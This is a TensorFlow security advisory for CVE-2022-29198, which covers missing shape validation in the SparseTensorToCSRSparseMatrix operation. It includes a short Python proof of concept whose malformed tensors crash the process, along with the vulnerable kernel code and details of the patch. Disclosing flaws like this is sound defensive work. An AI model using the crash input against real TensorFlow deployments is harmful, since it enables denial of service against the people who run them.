## TFSA-2022-068: Missing validation causes denial of service via `SparseTensorToCSRSparseMatrix`

### CVE Number
CVE-2022-29198

### Impact
The implementation of [`tf.raw_ops.SparseTensorToCSRSparseMatrix`](https://github.com/tensorflow/tensorflow/blob/f3b9bf4c3c0597563b289c0512e98d4ce81f886e/tensorflow/core/kernels/sparse/sparse_tensor_to_csr_sparse_matrix_op.cc#L65-L119) does not fully validate the input arguments. This results in a `CHECK`-failure which can be used to trigger a denial of service attack:

```python
import tensorflow as tf

indices = tf.constant(53, shape=[3], dtype=tf.int64)
values = tf.constant(0.554979503, shape=[218650], dtype=tf.float32)
dense_shape = tf.constant(53, shape=[3], dtype=tf.int64)

tf.raw_ops.SparseTensorToCSRSparseMatrix(
  indices=indices,
  values=values,
  dense_shape=dense_shape)
```

The code assumes `dense_shape` is a vector and `indices` is a matrix (as part of requirements for sparse tensors) but there is no validation for this:

```cc
    const Tensor& indices = ctx->input(0);
    const Tensor& values = ctx->input(1);
    const Tensor& dense_shape = ctx->input(2);
    const int rank = dense_shape.NumElements();
    OP_REQUIRES(ctx, rank == 2 || rank == 3,
                errors::InvalidArgument("SparseTensor must have rank 2 or 3; ",
                                        "but indices has rank: ", rank));
    auto dense_shape_vec = dense_shape.vec<int64_t>();
    // ...
    OP_REQUIRES_OK(
        ctx,
        coo_to_csr(batch_size, num_rows, indices.template matrix<int64_t>(),
                   batch_ptr.vec<int32>(), csr_row_ptr.vec<int32>(),
                   csr_col_ind.vec<int32>()));
```

### Patches
We have patched the issue in GitHub commit [ea50a40e84f6bff15a0912728e35b657548cef11](https://github.com/tensorflow/tensorflow/commit/ea50a40e84f6bff15a0912728e35b657548cef11).

The fix will be included in TensorFlow 2.9.0. We will also cherrypick this commit on TensorFlow 2.8.1, TensorFlow 2.7.2, and TensorFlow 2.6.4, as these are also affected and still in supported range.

### For more information
Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.

### Attribution
This vulnerability has been reported by Neophytos Christou from Secure Systems Lab at Brown University.
